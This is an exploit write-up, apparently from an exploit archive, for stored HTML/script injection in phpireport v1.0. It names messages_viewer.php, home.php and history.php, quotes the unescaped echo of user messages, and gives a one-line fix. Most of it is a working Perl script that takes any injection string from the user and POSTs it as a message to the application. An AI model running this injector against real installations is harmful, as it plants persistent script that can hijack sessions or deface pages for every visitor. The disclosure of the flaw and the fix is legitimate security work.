# Title= phpireport v1.0 => Remote Html Code injection
# Author = Or4nG.M4n
# Download = http://garr.dl.sourceforge.net/project/phpireport/phpireport%20v1.0%20alpha%20revision%2025.rar
# Thnks :
# +----------------------------------+
# | xSs m4n i-Hmx h311 c0d3|
# | Dr.Bnned ahwak2000 sa^Dev!L|
# +----------------------------------+
# Html injection
# vuln : messages_viewer.php
# vuln : home.php
# vuln : history.php
# code :
# echo "
# <li>
# <div class='post-details'><div style='float:left'>user: ".stripslashes($name)."</div> <div style='float:right'>".$time."</div></div>
# <br>
# <div class='post-details'>".stripslashes($message)."</div>
# </li>
# ";
# How i can Fixed ..
# in all vuln file
# Replace : stripslashes => Replace with => htmlspecialchars
# Thnks to All Stupid Coders
use LWP::UserAgent;
print "Code to inject #";
my $inj = <STDIN>;
chomp $inj;
my $url = 'http://localhost/phpireport/index.php';
my $ua = LWP::UserAgent->new();
my $response = $ua->post( $url, { 'message' => $inj } ); # Post <textarea rows='2' name='message' id='name'></textarea>
my $content= $response->decoded_content();
print "\n done \n";
# The End